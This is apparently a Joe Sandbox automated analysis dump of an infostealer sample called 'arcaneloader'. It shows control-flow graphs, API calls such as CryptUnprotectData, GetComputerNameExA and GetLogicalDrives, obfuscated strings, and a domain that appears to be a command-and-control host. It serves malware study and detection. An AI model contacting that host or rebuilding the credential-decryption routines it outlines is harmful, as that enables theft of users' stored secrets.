43a6d8-43a6db 70->76 74 43a6f8 71->74 81 43a6fc-43a700 74->81 78 43a725-43a728 75->78 79 43a77b-43a783 75->79 76->75 80 43a6dd-43a6f5 76->80 78->79 83 43a72a-43a779 78->83 84 43a785-43a789 79->84 85 43a78e-43a791 79->85 80->74 86 43a702-43a708 81->86 83->81 84->86 88 43a793-43a7bb 85->88 89 43a7c0-43a7c2 85->89 86->63 87 43a70e-43a710 86->87 87->67 90 43a712 87->90 88->74 89->74 90->63
                                                                          APIs
                                                                          • CoCreateInstance.OLE32(00445678,00000000,00000001,00445668,00000000), ref: 0043A2ED
                                                                          • SysAllocString.OLEAUT32(912B9FFB), ref: 0043A367
                                                                          • CoSetProxyBlanket.COMBASE(FC012CB8,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043A3AD
                                                                          • SysAllocString.OLEAUT32(?), ref: 0043A408
                                                                          • SysAllocString.OLEAUT32(81C987D9), ref: 0043A503
                                                                          • VariantInit.OLEAUT32(?), ref: 0043A572
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                          • String ID: C$PS$\$]]$^@:K$[U
                                                                          • API String ID: 65563702-3832223774
                                                                          • Opcode ID: 605fed1a75867b54c36bb4c147900357e8e078bd7e60b625ccf0a8180c265ee5
                                                                          • Instruction ID: 0b00fd55619220c5164c80419da9c7b14231372ae20546c5e651c2f421140ebb
                                                                          • Opcode Fuzzy Hash: 605fed1a75867b54c36bb4c147900357e8e078bd7e60b625ccf0a8180c265ee5
                                                                          • Instruction Fuzzy Hash: F412FE75A883408BD724CF24C885B5BBBE5EF89304F14892EE9C59B390D778D806CB96

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 91 435540-43562c GetSystemMetrics * 2 97 435633-4358a7 91->97
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MetricsSystem
                                                                          • String ID: $&^C$aYC$o^C$|]C$YC$YC$YC$YC$YC$YC$YC$YC$YC$YC
                                                                          • API String ID: 4116985748-3003443742
                                                                          • Opcode ID: b740e1d7f20848899819fd048a70c9d79a89a826e92aaca89430d53b2ca35061
                                                                          • Instruction ID: 4ce7114e25f20e890f8702e4eef0d9a75a5ee80db5788fd673bd1059a42f653e
                                                                          • Opcode Fuzzy Hash: b740e1d7f20848899819fd048a70c9d79a89a826e92aaca89430d53b2ca35061
                                                                          • Instruction Fuzzy Hash: 98815FB45097849FE360DF24D59878FBBE0FB85748F50891EE4889B250D7B99848CF86

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 100 41c8ca-41c8f7 call 408820 103 41c900-41c927 100->103 103->103 104 41c929-41c931 103->104 105 41c933-41c942 104->105 106 41c97a-41c9de call 401ac0 104->106 107 41c950-41c957 105->107 112 41c9e0-41c9fa 106->112 110 41c960-41c966 107->110 111 41c959-41c95c 107->111 110->106 114 41c968-41c977 call 43f4a0 110->114 111->107 113 41c95e 111->113 112->112 115 41c9fc-41ca17 call 401e80 112->115 113->106 114->106 120 41cb32-41cba6 115->120 121 41cb0d 115->121 122 41ca1e 115->122 123 41cbb0-41cbca 120->123 121->120 124 41ca20-41ca26 122->124 123->123 125 41cbcc-41cbdd call 401e80 123->125 124->124 126 41ca28-41ca5b 124->126 132 41cbf4-41cc37 125->132 133 41cbe4-41cbed 125->133 134 41ceee-41cef7 125->134 135 41cefe-41cf64 call 408810 125->135 128 41ca62 126->128 129 41ca5d-41ca60 126->129 131 41ca63-41ca73 128->131 129->128 129->131 136 41ca75-41ca78 131->136 137 41ca7a 131->137 141 41cc40-41cc8a 132->141 133->132 133->134 133->135 139 41cfc6-41cfff 133->139 134->132 134->135 138 41d1f1-41d396 134->138 134->139 148 41cf70-41cf9f 135->148 136->137 142 41ca7b-41ca94 call 408810 136->142 137->142 144 41d3a0-41d3bd 138->144 150 41d000-41d064 139->150 141->141 146 41cc8c-41ccb0 call 401eb0 141->146 153 41cdd4-41cddb 142->153 154 41ca9a-41cb06 call 4412a0 CryptUnprotectData 142->154 144->144 149 41d3bf-41d3ca 144->149 160 41cdc0 146->160 161 41cdc2-41cdcb 146->161 162 41cdb4-41cdb9 146->162 163 41ccb7-41ccf4 146->163 148->148 155 41cfa1-41cfbf call 401eb0 148->155 156 41d3eb-41d3f6 149->156 157 41d3cc-41d3d3 149->157 150->150 158 41d066-41d077 150->158 171 41cdf4-41ce3d call 420540 * 2 153->171 154->121 182 41cec4-41cecb 154->182 155->138 155->139 169 41d3f8 156->169 170 41d40c-41d476 156->170 166 41d3da-41d3e9 157->166 167 41d079 158->167 168 41d08b-41d0a7 call 4093a0 158->168 160->161 161->153 162->160 173 41cd00-41cd1a 163->173 166->156 166->166 176 41d080-41d089 167->176 188 41d0b0-41d0b9 168->188 177 41d3fb-41d40a 169->177 179 41d480-41d4ca 170->179 201 41cde0-41cdee 171->201 202 41ce3f-41ce56 call 420540 171->202 173->173 181 41cd1c-41cd91 call 41f7a0 call 402070 173->181 176->168 176->176 177->170 177->177 179->179 184 41d4cc-41d4f0 call 43ac70 179->184 181->162 187 41ced0-41ced9 182->187 197 41d802-41d82e 184->197 198 41d4f7-41d51c 184->198 199 41d7fc 184->199 200 41d7ef-41d7f9 call 408820 184->200 187->187 193 41cedb-41cede 187->193 188->188 194 41d0bb-41d0be 188->194 204 41cee4-41cee9 193->204 205 41d0ce 193->205 195 41d0c4-41d0c9 194->195 196 41d5cd 194->196 207 41d5d0-41d633 call 408810 195->207 196->207 208 41d51e-41d59a 198->208 199->197 200->199 201->154 201->171 202->201 221 41ce58-41ce80 202->221 206 41d0d1-41d117 call 408810 204->206 205->206 225 41d120-41d14e 206->225 222 41d640-41d67c 207->222 208->208 213 41d59c-41d5aa 208->213 218 41d5b0-41d5ba 213->218 219 41d736-41d739 213->219 223 41d5bd-41d5c6 218->223 224 41d73c-41d743 219->224 221->201 226 41ce86-41cea0 call 420540 221->226 222->222 227 41d67e-41d686 222->227 223->223 228 41d5c8 223->228 229 41d748-41d751 224->229 225->225 230 41d150-41d158 225->230 226->201 243 41cea6-41cebf 226->243 232 41d6a1-41d6b1 227->232 233 41d688-41d68f 227->233 228->207 228->224 229->229 234 41d753-41d758 229->234 235 41d171-41d181 230->235 236 41d15a-41d15f 230->236 239 41d6d1-41d6f6 call 409490 call 409e30 232->239 240 41d6b3-41d6ba 232->240 238 41d690-41d69f 233->238 241 41d75d-41d766 234->241 244 41d1a3 235->244 245 41d183-41d18f 235->245 242 41d160-41d16f 236->242 238->232 238->238 260 41d6fb 239->260 247 41d6c0-41d6cf 240->247 241->241 248 41d768-41d77a 241->248 242->235 242->242 243->201 246 41d1a6-41d1b9 call 409490 244->246 250 41d190-41d19f 245->250 246->138 247->239 247->247 252 41d783 248->252 253 41d77c-41d781 248->253 250->250 255 41d1a1 250->255 257 41d785-41d796 call 408810 252->257 253->257 255->246 262 41d7b1-41d7bf 257->262 263 41d798-41d79e 257->263 260->260 265 41d7c1-41d7c4 262->265 266 41d7e2-41d7e4 262->266 264 41d7a0-41d7af 263->264 264->262 264->264 267 41d7c6-41d7d5 265->267 266->200 267->267 268 41d7d7 267->268 268->266
                                                                          APIs
                                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041CAF3
                                                                            • Part of subcall function 0043F4A0: LdrInitializeThunk.NTDLL(00441E5D,005C003F,00000018,?,?,00000018,?,?,?), ref: 0043F4CE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CryptDataInitializeThunkUnprotect
                                                                          • String ID: @HD$"$Cv$F$HK$JPJY$KK7D$OX$Ow$X$Z$|$F[D$s}${e
                                                                          • API String ID: 279577407-1832894750
                                                                          • Opcode ID: 387dda948366e0661d74f29b77b0fa7233144efc7b43bd4eef04fd221e3a40d0
                                                                          • Instruction ID: 7bdabe343a5318d9dde8d3736c21ea19e48050fb991c66e7e3c80059a47da189
                                                                          • Opcode Fuzzy Hash: 387dda948366e0661d74f29b77b0fa7233144efc7b43bd4eef04fd221e3a40d0
                                                                          • Instruction Fuzzy Hash: 1A729DB55083808BC734DF28C8967EFB7E1AF95314F18892DD4D98B391EB385945CB86

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 269 40b270-40b2a6 270 40b2b0-40b2d1 269->270 270->270 271 40b2d3-40b3db 270->271 272 40b3e0-40b3f6 271->272 272->272 273 40b3f8-40b41f 272->273 274 40b420-40b48b 273->274 274->274 275 40b48d-40b4a4 call 40c0f0 274->275 277 40b4a9-40b4b0 275->277 278 40b4b6-40b4ce 277->278 279 40b75e-40b76a 277->279 280 40b4d0-40b4f3 278->280 280->280 281 40b4f5-40b4fb 280->281 282 40b500-40b50b 281->282 283 40b512-40b516 282->283 284 40b50d-40b510 282->284 285 40b755-40b75b call 43ca40 283->285 286 40b51c-40b536 283->286 284->282 284->283 285->279 288 40b540-40b58c 286->288 288->288 290 40b58e-40b598 288->290 291 40b5d5-40b5d7 290->291 292 40b59a-40b5a5 290->292 293 40b750-40b752 291->293 294 40b5dd-40b61b 291->294 295 40b5b7-40b5bc 292->295 293->285 297 40b620-40b63a 294->297 295->293 296 40b5c2-40b5c9 295->296 298 40b5cb-40b5cd 296->298 299 40b5cf 296->299 297->297 300 40b63c-40b646 297->300 298->299 301 40b5b0-40b5b5 299->301 302 40b5d1-40b5d3 299->302 303 40b685-40b689 300->303 304 40b648-40b655 300->304 301->291 301->295 302->301 303->293 305 40b68f-40b6aa 303->305 306 40b667-40b66c 304->306 307 40b6b0-40b6dc 305->307 306->293 308 40b672-40b679 306->308 307->307 309 40b6de-40b6ec 307->309 310 40b67b-40b67d 308->310 311 40b67f 308->311 312 40b723-40b725 309->312 313 40b6ee-40b6fa 309->313 310->311 314 40b660-40b665 311->314 315 40b681-40b683 311->315 317 40b72f-40b74e call 40afc0 312->317 316 40b707-40b70c 313->316 314->303 314->306 315->314 316->293 318 40b70e-40b715 316->318 317->285 320 40b717-40b719 318->320 321 40b71b 318->321 320->321 323 40b700-40b705 321->323 324 40b71d-40b721 321->324 323->316 325 40b727-40b72d 323->325 324->323 325->293 325->317
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: *G7A$0_1Y$2C5M$4[Me$:K>U$;W Q$=S#]$A;E$C+[5$E?G9$K#O-$O/R)$T'R!$^;$ngfa${O1I$~$G
                                                                          • API String ID: 0-1588782830
                                                                          • Opcode ID: b808178bdd0a2737871c520d4453b0c67bcc14fd14c86eb7a07cbe5d0eb4913b
                                                                          • Instruction ID: 2f53f5ab52d22a7194f24516e713320aa84c6c71a96a9c81b0f44bdf0c73b6d4
                                                                          • Opcode Fuzzy Hash: b808178bdd0a2737871c520d4453b0c67bcc14fd14c86eb7a07cbe5d0eb4913b
                                                                          • Instruction Fuzzy Hash: CED1167250C3948BC324CF25849126BBBE2EFD2714F188A6DE4E55B391D7798909CBCB

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1724 40ed41-40ed7a call 435540 call 409e30 CoUninitialize 1729 40ed80-40ed94 1724->1729 1729->1729 1730 40ed96-40edbb 1729->1730 1731 40edc0-40ee08 1730->1731 1731->1731 1732 40ee0a-40ee7f 1731->1732 1733 40ee80-40eef5 1732->1733 1733->1733 1734 40eef7-40ef08 1733->1734 1735 40ef0a-40ef18 1734->1735 1736 40ef2b-40ef3a 1734->1736 1737 40ef20-40ef29 1735->1737 1738 40ef4b-40ef58 1736->1738 1739 40ef3c-40ef3f 1736->1739 1737->1736 1737->1737 1741 40ef5a-40ef61 1738->1741 1742 40ef7b-40ef83 1738->1742 1740 40ef40-40ef49 1739->1740 1740->1738 1740->1740 1743 40ef70-40ef79 1741->1743 1744 40ef85-40ef86 1742->1744 1745 40ef9b-40efa5 1742->1745 1743->1742 1743->1743 1746 40ef90-40ef99 1744->1746 1747 40efa7-40efab 1745->1747 1748 40efbb-40efc7 1745->1748 1746->1745 1746->1746 1749 40efb0-40efb9 1747->1749 1750 40efe1-40f10f 1748->1750 1751 40efc9-40efcb 1748->1751 1749->1748 1749->1749 1753 40f110-40f13c 1750->1753 1752 40efd0-40efdd 1751->1752 1752->1752 1754 40efdf 1752->1754 1753->1753 1755 40f13e-40f168 1753->1755 1754->1750 1756 40f170-40f1cb 1755->1756 1756->1756 1757 40f1cd-40f1fa call 40c0f0 1756->1757 1759 40f1ff-40f220 1757->1759
                                                                          APIs
                                                                            • Part of subcall function 00435540: GetSystemMetrics.USER32 ref: 00435589
                                                                            • Part of subcall function 00435540: GetSystemMetrics.USER32 ref: 00435599
                                                                          • CoUninitialize.COMBASE ref: 0040ED56
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MetricsSystem$Uninitialize
                                                                          • String ID: ),>,$; 34$JKJI$X0$frogs-severz.sbs$GUE
                                                                          • API String ID: 1128523136-2361847433
                                                                          • Opcode ID: c0c5fc3554df1080a930af1c41e7bb8c8345cec9a0cd29b16d354af7f59ccdf8
                                                                          • Instruction ID: 9d012ff14df40c5026412943e8085f88ed5e2b5c642ce0170b92deccb5927b46
                                                                          • Opcode Fuzzy Hash: c0c5fc3554df1080a930af1c41e7bb8c8345cec9a0cd29b16d354af7f59ccdf8
                                                                          • Instruction Fuzzy Hash: DDC1E17150D3918BD3358F25C8913EBBFE2ABD6318F184A6DD4C9AB381DB784905CB86

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1760 40c10e-40c2ff 1761 40c300-40c31f 1760->1761 1761->1761 1762 40c321-40c545 1761->1762 1764 40c550-40c56f 1762->1764 1764->1764 1765 40c571-40c579 1764->1765 1766 40c57c-40c58f 1765->1766
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8G1A$Dg+a$K'D!$U#I-$W;C%$w+wU$|_vY${Qe
                                                                          • API String ID: 0-3275651424
                                                                          • Opcode ID: 7e78ab07706f1ce07f1f6dc755e374cd28aea3dddf7c3d9e555a9a57ec2978a4
                                                                          • Instruction ID: 1122c349f357e9f8924bf3ae55dffd2a0887e0537cf4f6dc7b1164af973e402f
                                                                          • Opcode Fuzzy Hash: 7e78ab07706f1ce07f1f6dc755e374cd28aea3dddf7c3d9e555a9a57ec2978a4
                                                                          • Instruction Fuzzy Hash: 24B1EBB44143808FE3549F26C989FA97FB0FB52204F5A96E9D1592F772DB348406CF8A

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1767 408f40-408f51 call 43deb0 1770 408f57-408f6f SHGetSpecialFolderPathW call 437700 1767->1770 1771 4090d9-4090db ExitProcess 1767->1771 1774 4090d4 call 43f3b0 1770->1774 1775 408f75-408f9b GetCurrentThreadId GetCurrentProcessId 1770->1775 1774->1771 1777 408fa1-40907b GetForegroundWindow 1775->1777 1778 408f9d-408f9f 1775->1778 1779 4090b0-4090c8 call 40a350 1777->1779 1780 40907d-4090a6 1777->1780 1778->1777 1779->1774 1785 4090ca call 40d420 1779->1785 1781 4090a8-4090aa 1780->1781 1782 4090ac-4090ae 1780->1782 1781->1782 1782->1779 1787 4090cf call 40c0c0 1785->1787 1787->1774
                                                                          APIs
                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408F62
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00408F75
                                                                          • GetCurrentProcessId.KERNEL32 ref: 00408F7D
                                                                          • GetForegroundWindow.USER32 ref: 00409073
                                                                          • ExitProcess.KERNEL32 ref: 004090DB
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                          • String ID:
                                                                          • API String ID: 4063528623-0
                                                                          • Opcode ID: 4290895ae9671ffd7fc316db242a24f340638f5227a289abfd9a7799e35f85c7
                                                                          • Instruction ID: ead2fa2458e5ccc8f2f6a7ceba12f98d960acc93df0da4a6f063baeda188eb93
                                                                          • Opcode Fuzzy Hash: 4290895ae9671ffd7fc316db242a24f340638f5227a289abfd9a7799e35f85c7
                                                                          • Instruction Fuzzy Hash: 9D412673E446201BD708AF7ACC8A35AB6D75BC4310F0EC53D6D88EB3E5E9388C058685

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1793 4269c2-4269c5 1794 4269e4-4269ec 1793->1794 1795 4269cc 1793->1795 1796 4269f5 1794->1796 1797 4269ee-4269f3 1794->1797 1795->1794 1798 4269fc-426a36 call 408810 1796->1798 1797->1798 1801 426a40-426a5e 1798->1801 1801->1801 1802 426a60-426a68 1801->1802 1803 426a81-426a8e 1802->1803 1804 426a6a-426a6f 1802->1804 1806 426a90-426a94 1803->1806 1807 426ab1-426ac9 call 441e80 1803->1807 1805 426a70-426a7f 1804->1805 1805->1803 1805->1805 1808 426aa0-426aaf 1806->1808 1811 426c82 1807->1811 1812 426d82 1807->1812 1813 426dc3-426def 1807->1813 1814 426ae0-426ae8 1807->1814 1815 426c80 1807->1815 1816 426d80 1807->1816 1817 426c87-426d3f 1807->1817 1818 426c6a 1807->1818 1819 426d88-426d8e call 408820 1807->1819 1820 426ad0-426ad7 1807->1820 1821 426c70-426c76 call 408820 1807->1821 1822 426db0 1807->1822 1823 426db6-426dc2 1807->1823 1824 426d97 1807->1824 1825 426c58-426c62 1807->1825 1826 426c79-426c7f 1807->1826 1827 426d9d-426da6 call 408820 1807->1827 1808->1807 1808->1808 1834 426d79-426d7f 1811->1834 1812->1819 1832 426df0-426e35 1813->1832 1828 426af1 1814->1828 1829 426aea-426aef 1814->1829 1815->1811 1816->1812 1835 426d40-426d5d 1817->1835 1818->1821 1819->1824 1820->1814 1821->1826 1822->1823 1824->1827 1825->1818 1826->1815 1827->1822 1836 426af8-426ba7 call 408810 1828->1836 1829->1836 1832->1832 1839 426e37-426ec7 1832->1839 1834->1816 1835->1835 1841 426d5f-426d6f call 424a90 1835->1841 1848 426bb0-426bd8 1836->1848 1843 426ed0-426f42 1839->1843 1845 426d74-426d77 1841->1845 1843->1843 1847 426f44-426f6d call 4246c0 1843->1847 1845->1834 1848->1848 1850 426bda-426be2 1848->1850 1852 426c01-426c0e 1850->1852 1853 426be4-426beb 1850->1853 1855 426c10-426c14 1852->1855 1856 426c31-426c51 GetLogicalDrives call 441e80 1852->1856 1854 426bf0-426bff 1853->1854 1854->1852 1854->1854 1857 426c20-426c2f 1855->1857 1856->1811 1856->1812 1856->1813 1856->1815 1856->1816 1856->1818 1856->1819 1856->1821 1856->1822 1856->1823 1856->1824 1856->1825 1856->1826 1856->1827 1857->1856 1857->1857
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: f$EC$][
                                                                          • API String ID: 0-2457055411
                                                                          • Opcode ID: 6892c7f6e06dc625f46d2498c252b5b4440cbcb91afea0c7e6fad0f79e4d6d20
                                                                          • Instruction ID: 842a609e815ecc4ce36ae6e8bb820a9096674b54fe555c39fd9feabf8fb66444
                                                                          • Opcode Fuzzy Hash: 6892c7f6e06dc625f46d2498c252b5b4440cbcb91afea0c7e6fad0f79e4d6d20
                                                                          • Instruction Fuzzy Hash: 84D1C8B5208340DBD310DF69E89126BBBE1FB86314F448A2DF1D58B351EB79C906CB4A

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1860 4222f0-4222fb 1861 422300-422309 1860->1861 1861->1861 1862 42230b-42233b 1861->1862 1864 422340-422378 1862->1864 1864->1864 1865 42237a-422389 1864->1865 1866 422541 1865->1866 1867 422444-42247f 1865->1867 1868 4223e5-4223eb call 441e80 1865->1868 1869 422549-42254f call 408820 1865->1869 1870 4223cd 1865->1870 1871 422552-42255b 1865->1871 1872 422390-422396 1865->1872 1873 422431-422433 1865->1873 1874 4223d5-4223e0 call 408820 1865->1874 1875 422415 1865->1875 1876 42243a 1865->1876 1877 4224bb-4224f3 1865->1877 1878 4223ff-42240e 1865->1878 1879 42241d-42242a call 408820 1865->1879 1866->1869 1881 422480-4224a7 1867->1881 1894 4223f0-4223f8 1868->1894 1869->1871 1870->1874 1883 422398-42239d 1872->1883 1884 42239f 1872->1884 1873->1866 1873->1867 1873->1869 1873->1871 1873->1876 1873->1877 1874->1871 1875->1879 1876->1867 1882 422500-422527 1877->1882 1878->1866 1878->1867 1878->1869 1878->1871 1878->1873 1878->1875 1878->1876 1878->1877 1878->1879 1879->1866 1879->1867 1879->1869 1879->1871 1879->1873 1879->1876 1879->1877 1881->1881 1892 4224a9-4224b8 call 424a90 1881->1892 1882->1882 1888 422529-422533 call 424a90 1882->1888 1889 4223a2-4223c6 call 408810 1883->1889 1884->1889 1898 422538 1888->1898 1889->1866 1889->1867 1889->1868 1889->1869 1889->1870 1889->1871 1889->1873 1889->1874 1889->1875 1889->1876 1889->1877 1889->1878 1889->1879 1892->1877 1894->1866 1894->1867 1894->1869 1894->1871 1894->1873 1894->1875 1894->1876 1894->1877 1894->1878 1894->1879 1898->1866
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Eq&{$Eq&{$Lq&{$Lq&{
                                                                          • API String ID: 0-1854877544
                                                                          • Opcode ID: 904748880ccd16602758f575d7cd84f6a97d1dac0cc732244aae6f106613aa36
                                                                          • Instruction ID: 15447ccef762282df6fdcd2482e2bd9f8a638bc7f0dcdeb2c029ea22900a286a
                                                                          • Opcode Fuzzy Hash: 904748880ccd16602758f575d7cd84f6a97d1dac0cc732244aae6f106613aa36
                                                                          • Instruction Fuzzy Hash: 1B512775608341AFD310EF64F881B5BBBE4EB8A348F04883EF58587290E7799945CB5B

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1920 42edfb-42ee3b call 4412a0 1924 42ee40-42ee6b 1920->1924 1924->1924 1925 42ee6d-42ee75 1924->1925 1926 42ee77-42ee7f 1925->1926 1927 42ee8d-42ee90 1925->1927 1928 42ee80-42ee89 1926->1928 1929 42ee93-42ee9b 1927->1929 1928->1928 1930 42ee8b 1928->1930 1931 42eeab-42ef0b call 4412a0 GetComputerNameExA 1929->1931 1932 42ee9d-42ee9f 1929->1932 1930->1929 1937 42ef10-42ef41 1931->1937 1933 42eea0-42eea9 1932->1933 1933->1931 1933->1933 1937->1937 1938 42ef43-42ef48 1937->1938 1939 42ef4a-42ef57 1938->1939 1940 42ef6d-42ef76 1938->1940 1941 42ef60-42ef69 1939->1941 1942 42ef79-42ef81 1940->1942 1941->1941 1943 42ef6b 1941->1943 1944 42ef83-42ef84 1942->1944 1945 42ef9b-42efda GetComputerNameExA 1942->1945 1943->1942 1947 42ef90-42ef99 1944->1947 1946 42efe0-42f010 1945->1946 1946->1946 1948 42f012-42f017 1946->1948 1947->1945 1947->1947 1949 42f019-42f01f 1948->1949 1950 42f02d 1948->1950 1951 42f020-42f029 1949->1951 1952 42f030-42f038 1950->1952 1951->1951 1953 42f02b 1951->1953 1954 42f03a-42f03b 1952->1954 1955 42f04b-42f08f 1952->1955 1953->1952 1956 42f040-42f049 1954->1956 1958 42f090-42f0c2 1955->1958 1956->1955 1956->1956 1958->1958 1959 42f0c4-42f0c9 1958->1959 1960 42f0db-42f0e3 1959->1960 1961 42f0cb-42f0cf 1959->1961 1962 42f0e5-42f0e6 1960->1962 1963 42f0fb-42f149 call 4412a0 1960->1963 1964 42f0d0-42f0d9 1961->1964 1965 42f0f0-42f0f9 1962->1965 1969 42f150-42f18c 1963->1969 1964->1960 1964->1964 1965->1963 1965->1965 1969->1969 1970 42f18e-42f193 1969->1970 1971 42f195-42f198 1970->1971 1972 42f1ad 1970->1972 1973 42f1a0-42f1a9 1971->1973 1974 42f1af-42f1e6 call 430730 1972->1974 1973->1973 1975 42f1ab 1973->1975 1978 42f1f0-42f202 1974->1978 1975->1974 1978->1978 1979 42f204-42f20b 1978->1979 1980 42f21b-42f21e call 433670 1979->1980 1981 42f20d-42f20f 1979->1981 1984 42f223-42f241 1980->1984 1982 42f210-42f219 1981->1982 1982->1980 1982->1982
                                                                          APIs
                                                                          • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042EEE5
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_arcaneloader.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ComputerName
                                                                          • String ID:
                                                                          • API String ID: 3545744682-0
                                                                          • Opcode ID: 7cbfa526744e63013249bd5da1a754e1e5cc963dc7eaeae7a3003896340be045
                                                                          • Instruction ID: 142982892f5f11325e723778e1f9dcbc7497a046d0b64463dc0703ab0d60ea86
                                                                          • Opcode Fuzzy Hash: 7cbfa526744e63013249bd5da1a754e1e5cc963dc7eaeae7a3003896340be045
                                                                          • Instruction Fuzzy Hash: 1AD103302047818FEB158F36D460B72BBE2AF57304F5884AED0D69B393D7799846CB29

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1985 42edf6-42eec4 call 4412a0 1988 42eec9-42ef0b GetComputerNameExA 1985->1988 1989 42ef10-42ef41 1988->1989 1989->1989 1990 42ef43-42ef48 1989->1990 1991 42ef4a-42ef57 1990->1991 1992 42ef6d-42ef76 1990->1992 1993 42ef60-42ef69 1991->1993 1994 42ef79-42ef81 1992->1994 1993->1993 1995 42ef6b 1993->1995 1996 42ef83-42ef84 1994->1996 1997 42ef9b-42efda GetComputerNameExA 1994->1997 1995->1994 1999 42ef90-42ef99 1996->1999 1998 42efe0-42f010 1997->1998 1998->1998 2000 42f012-42f017 1998->2000 1999->1997 1999->1999 2001 42f019-42f01f 2000->2001 2002 42f02d 2000->2002 2003 42f020-42f029 2001->2003 2004 42f030-42f038 2002->2004 2003->2003 2005 42f02b 2003->2005 2006 42f03a-42f03b 2004->2006 2007 42f04b-42f08f 2004->2007 2005->2004 2008 42f040-42f049 2006->2008 2010 42f090-42f0c2 2007->2010 2008->2007 2008->2008 2010->2010 2011 42f0c4-42f0c9 2010->2011 2012 42f0db-42f0e3 2011->2012 2013 42f0cb-42f0cf 2011->2013 2014 42f0e5-42f0e6 2012->2014 2015 42f0fb-42f149 call 4412a0 2012->2015 2016 42f0d0-42f0d9 2013->2016 2017 42f0f0-42f0f9 2014->2017 2021 42f150-42f18c 2015->2021 2016->2012 2016->2016 2017->2015 2017->2017 2021->2021 2022 42f18e-42f193 2021->2022 2023 42f195-42f198 2022->2023 2024 42f1ad 2022->2024 2025 42f1a0-42f1a9 2023->2025 2026 42f1af-42f1e6 call 430730 2024->2026 2025->2025 2027 42f1ab 2025->2027 2030 42f1f0-42f202 2026->2030 2027->2026 2030->2030 2031 42f204-42f20b 2030->2031 2032 42f21b-42f21e call 433670 2031->2032 2033 42f20d-42f20f 2031->2033 2036 42f223-42f241 2032->2036 